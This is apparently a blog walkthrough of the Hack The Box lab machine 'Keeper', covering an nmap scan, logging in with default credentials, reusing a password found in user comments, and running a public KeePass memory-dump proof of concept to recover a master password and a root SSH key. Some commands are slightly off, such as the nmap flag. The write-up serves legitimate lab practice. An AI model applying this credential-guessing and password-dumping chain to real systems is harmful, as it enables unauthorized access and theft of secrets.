Skip to main content
HashnodeUntitled Publication

Command Palette

Search for a command to run...

Keeper | HTB Walkthrough

Published
4 min read
R
Rasmeet Singh

Connecting to VPN

Firstly, select the most suitable server (probably with the lowest ping) and download the VPN connection file from HTB. I personally use OpenVPN. For that, open the terminal and type the following commands:

cd Downloads/
sudo openvpn <address_for_the_.ovpn_file>

If OpenVPN is not installed, run the following command in the terminal:

sudo apt-get install openvpn

The above commands if executed properly will establish a VPN connection for your host machine and HTB's server. It usually takes a minute or two for the connection to be established.

Running an NMAP scan

Our first step will be running an nmap scan for our target IP (here 10.10.11.227). It will be executed running the following command:

nmap -allports 10.10.11.227

Upon running nmap, we immediately get the result showing that port 22 and port 80 are open. By default, port 22 is for ssh and port 80 is a website using HTTP protocol.

Website Lookup

Now, we will look up for the target IP address in the browser

Here we can see the message "To raise an IT Support ticket, please visit tickets.keeper.htb/rt/. Upon clicking this hyperlink, we get an error message for the page not found. To fix this, we need to go to out /etc/hosts and set up the machine IP.

sudo nano /etc/hosts

As shown above, we need to add the machine's IP, following the already existing IP-Name Resolution format.

10.10.11.227 tickets.keeper.htb keeper.htb

Once done, we can now access the previous hyperlink. It leads us to a login page:

Looking for default credentials

We try some default credentials in username and password text boxes, such as admin admin, admin password, root root, root password

The root password credentials work and lead us to the following page:

Navigating the User's Account

Upon navigating through the user's account, we see that under admin tab we have 2 users - lnorgaard and root.

upon clicking on lnorgaard, we can see the following page open up:

Upon examining this page, we can see an important credential exposed. In the 'Comments about this user', we can see the intial password set to "Welcome2023!"

Now we will try ssh with the above found username "lnorgaard" and password "Welcome2023!"

We have successfully logged in and gained a low privileged user shell login.

Upon doing ls we can see the following list:

We can see a zip file RT30000.zip. Lets see if we can get it back in our box so we can start poking around with it. For that we run python3 server using the following command:

python3 -m http.server

Making a separate directory to work with

Lets make a separate directory named 'workstation' for the ease of our use. Run the following commands in the terminal for the same:

cd Desktop/
mkdir workstation
cd workstation/

Now we will run the server to download and unzip the RT30000.zip file.

Run the following command:

wget http://10.10.11.227:8000/RT30000.zip

Unzipping RT30000.zip file

Upon unzipping the file, we get passcodes.kbdx file

Now we check whether there is a poc available for KeePass vulnerability

Head over to github -> vdohney/keepass-password-dumper poc, or clone the below mentioned repo directly in your host machine

git clone https://github.com/vdohney/keepass-password-dumper.git

Go into keepass-password-dumper/ and run the password dumper using dotnet, using the following commands:

cd keepass-password-dumper/
dotnet run ../KeePassDumpFull.dmp

We can see something written at the last of the output which consists of special characters as well. Upon searching on Google it seems it is a popular Danish dish 'rødgrød med fløde'

Running kpcli

Let's run kpcli and try the above-found word as the master password of passcodes.kdbx file. Hopefully, it works:

Upon ls, we can see passcodes/ in it. And upon further ls, we can see multiple options. Upon trying these options further, we found something under Network/

When we run show 0 -f command, we see the following output (-f is used to see hidden passcodes)

Let's try ssh with username root and password F4><3K0nd!

Unfortunately, it did not work.

Let's go again in kpcli and see if we find something in option 1

Let's make a file named putty using the command sudo nano putty and copy the output we got from show 0 -f command. Then we will remove the white spaces from it using vscode.

Save the file.

Open putty and under ssh -> configuration file, put the putty key we found above. We will gain root access post that

Comments

Join the discussion

No comments yet. Be the first to comment.

More from this blog

Untitled Publication

4 posts